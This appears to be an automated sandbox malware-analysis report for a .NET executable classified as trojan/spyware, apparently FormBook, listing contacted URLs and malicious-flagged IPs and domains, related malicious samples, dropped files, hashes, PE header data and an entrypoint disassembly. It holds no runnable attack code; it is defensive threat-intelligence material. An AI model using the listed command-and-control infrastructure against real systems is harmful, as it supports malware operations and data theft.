                                                                                              http://digi-searches.com/DAT_to_MP3.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC4ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://digi-searches.com/The_Associates.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://digi-searches.com/Camas.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC4kDJLBieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://i2.cdn-image.com/__media__/js/min.js?v2.3ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://digi-searches.com/sk-logabpstatus.php?a=MWlFQ2d5amYxYkhvc2pKQXl3UXEzUFhuMVFMYXlyY3I5aGZUSVNHcieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.kkpmoneysocial.topikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003428000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            154.208.202.225
                                                                                                            		www.zoomlive.liveSeychelles
                                                                                                            		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                            77.68.64.45
                                                                                                            		www.dietcoffee.onlineUnited Kingdom
                                                                                                            		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                                                            104.21.112.1
                                                                                                            		www.kkpmoneysocial.topUnited States
                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                            209.74.77.107
                                                                                                            		www.happyjam.lifeUnited States
                                                                                                            		31744MULTIBAND-NEWHOPEUSfalse
                                                                                                            18.139.62.226
                                                                                                            		dns.ladipage.comUnited States
                                                                                                            		16509AMAZON-02USfalse
                                                                                                            154.12.28.184
                                                                                                            		www.7261ltajbc.bondUnited States
                                                                                                            		174COGENT-174USfalse
                                                                                                            104.21.32.1
                                                                                                            		www.aziziyeescortg.xyzUnited States
                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                            84.32.84.32
                                                                                                            		123hellodrive.shopLithuania
                                                                                                            		33922NTT-LT-ASLTtrue
                                                                                                            208.91.197.27
                                                                                                            		www.guacamask.onlineVirgin Islands (BRITISH)
                                                                                                            		40034CONFLUENCE-NETWORK-INCVGfalse

                                                                                                            General Information

                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                            Analysis ID:1588694
                                                                                                            Start date and time:2025-01-11 04:23:32 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 9m 31s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Run name:Run with higher sleep bypass
                                                                                                            Number of analysed new started processes analysed:10
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:2
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:BalphRTkPS.exe
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:2cfc0e37c8bb5910b2155f5585a9ad3b40582319fd2762c48fef6b25c727e929.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@11/9
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 75%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 89%
                                                                                                            • Number of executed functions: 89
                                                                                                            • Number of non-executed functions: 280
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 20.109.210.53
                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            No simulations

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            154.208.202.225NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.zoomlive.live/k6vm/
                                                                                                            ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.zoomlive.live/k6vm/
                                                                                                            77.68.64.45NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.dietcoffee.online/725g/
                                                                                                            ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.dietcoffee.online/725g/
                                                                                                            RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                                                            • www.dietcoffee.online/ugyg/
                                                                                                            PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.dietcoffee.online/dm4p/
                                                                                                            NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.dietcoffee.online/ugyg/
                                                                                                            Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • www.dietcoffee.online/dm4p/
                                                                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.dietcoffee.online/dm4p/
                                                                                                            104.21.112.19MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.buyspeechst.shop/qzi3/
                                                                                                            QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.buyspeechst.shop/w98i/
                                                                                                            wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                                                            SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                            • beammp.com/phpmyadmin/

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            www.guacamask.onlineNFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 208.91.197.27
                                                                                                            ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 208.91.197.27
                                                                                                            PO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                                                                            • 208.91.197.27
                                                                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                            • 208.91.197.27
                                                                                                            dns.ladipage.comSpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.228.81.39
                                                                                                            5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.228.81.39
                                                                                                            0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 18.139.62.226
                                                                                                            NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 18.139.62.226
                                                                                                            EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.228.81.39
                                                                                                            bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 18.139.62.226
                                                                                                            KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.228.81.39
                                                                                                            Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.228.81.39
                                                                                                            ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.228.81.39
                                                                                                            ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 18.139.62.226
                                                                                                            www.aziziyeescortg.xyzNFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.80.1
                                                                                                            ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.77.71
                                                                                                            rPaymentAdviceNote_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.77.71
                                                                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 188.114.96.3

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            ONEANDONE-ASBrauerstrasse48DEPGK60fNNCZ.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 74.208.236.156
                                                                                                            zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 74.208.236.156
                                                                                                            hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 217.160.0.183
                                                                                                            gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 217.160.0.113
                                                                                                            NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 77.68.64.45
                                                                                                            https://media.maxfs.de/Get hashmaliciousUnknownBrowse
                                                                                                            • 212.227.100.139
                                                                                                            miori.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 217.174.247.149
                                                                                                            Onedrive Shared document.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 77.68.14.124
                                                                                                            rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 217.160.0.160
                                                                                                            https://www.boulderpeptide.org/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                            • 74.208.236.22
                                                                                                            DXTL-HKDXTLTseungKwanOServiceHKNFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 154.208.202.225
                                                                                                            frosty.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 156.235.189.191
                                                                                                            sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 154.218.87.90
                                                                                                            3.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 45.194.232.108
                                                                                                            empsl.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 156.235.189.142
                                                                                                            gmips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 156.235.189.157
                                                                                                            earm.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 156.235.189.161
                                                                                                            sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 156.235.189.130
                                                                                                            miori.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 45.197.112.87
                                                                                                            z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 156.237.184.168
                                                                                                            CLOUDFLARENETUSWru9ycO2MJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 104.26.13.205
                                                                                                            iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 104.26.12.205
                                                                                                            n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.18.73.116
                                                                                                            tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 104.26.12.205
                                                                                                            02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 172.67.167.146
                                                                                                            5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 172.67.74.152
                                                                                                            MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.64.1
                                                                                                            https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNXGet hashmaliciousUnknownBrowse
                                                                                                            • 104.17.205.31
                                                                                                            https://youtube.com0x360x380x370x340x370x340x370x300x370x330x330x610x320x660x320x660x360x310x360x640x360x360x370x320x320x650x370x320x370x350x320x660x370x320x360x620x320x650x370x300x360x380x370x300x330x660x360x390x360x340x330x640x330x320x330x300x330x300x320x360x370x330x360x390x370x340x360x350x350x660x360x390x360x340x330x640x370x330x330x310x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x320x360x310x360x650x360x650x360x350x370x320x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x330x360x630x360x390x360x330x360x620x320x360x360x350x370x360x360x350x360x650x370x340x330x330x330x640x330x310x320x620x320x350x330x320x340x360x320x620x320x350x330x350x340x320x330x320x330x350x330x300x320x350x330x350x340x340x320x620x320x350x330x350x340x320x360x390x360x650x360x340x360x350x370x380x350x660x360x320x350x660x360x330x320x350x330x350x340x340x320x620x320x350x340x340x330x300x320x350x330x390x330x330x320x350x340x340x330x300x320x350x340x320x340x320x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x300x320x350x340x320x330x320x320x350x340x340x330x300x320x350x340x320x340x340x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x310x320x350x330x380x340x360x320x620x320x350x340x340x330x310x320x350x330x380x330x310x320x350x340x340x330x310x320x350x330x380x330x320x320x350x340x340x330x340x370x380x360x340x390x320x390x330x370x320x330x300x390x340x370x330x340x300x330x340x2d0x380x380x340x330x340x370x330x340x300x340x390x300x350x370x330x370x340x330x300x340x300x330x340x380x320x2d0x340x300x390x340x380x2d0x320x2d0x340x380x380x320x2d0x330x320x380x380x340x370x370x320x390x390x320x380x380x380x340x370x340x370x320x390x300x340x390x340x370x320x340x300x380x320x340x370x340x370x320x620x320x640x320x620x320x350x340x340x330x300x320x350x330x390x330x340x320x350x340x340x330x300x320x350x340x320x330x350x320x350x340x340x330x300x320x350x340x320x340x330x320x350x340x340x330x300x320x350x340x320x330x380x320x350x340x340x330x300x320x350x340x320x340x310x320x350x340x340x330Get hashmaliciousUnknownBrowse
                                                                                                            • 172.64.41.3

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BalphRTkPS.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\BalphRTkPS.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:true
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                            C:\Users\user\AppData\Local\Temp\086604I_P

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\ieUnatt.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                            Category:dropped
                                                                                                            Size (bytes):196608
                                                                                                            Entropy (8bit):1.1239949490932863
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                            MD5:271D5F995996735B01672CF227C81C17
                                                                                                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.24758705905619
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            File name:BalphRTkPS.exe
                                                                                                            File size:962'560 bytes
                                                                                                            MD5:e3b4ddaa99a7555532ea6b36bff69afc
                                                                                                            SHA1:58f1b2ac036a0192d3226a321c0e6e0e8412c3fb
                                                                                                            SHA256:2cfc0e37c8bb5910b2155f5585a9ad3b40582319fd2762c48fef6b25c727e929
                                                                                                            SHA512:dc0d96cbf540f242348ec866f3b80eb3263181a780379a839531d9123cd312cd4b58eea01b574db614f2e059c80028708fb1da5c72bb208e100f8eca073389d5
                                                                                                            SSDEEP:12288:bpZsS9uLZf6nmPvktDuptzswN8bTkD+Hm8ix/0UzGMzysWFVyDovD3os+pVv:bzs0udfveuXzXNyTmEmX/0zFVDD3epl
                                                                                                            TLSH:6325E63D29BD222BA075C797CBEBF427F174986F3114ACA498D343A94346A4774C326E
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."#R...............0.............N.... ........@.. ....................... ............@................................

                                                                                                            File Icon

                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4ec54e
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0xA5522322 [Thu Nov 22 02:59:46 2057 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xec4fc0x4f.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xee0000x5ac.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xf00000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xeabf80x70.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
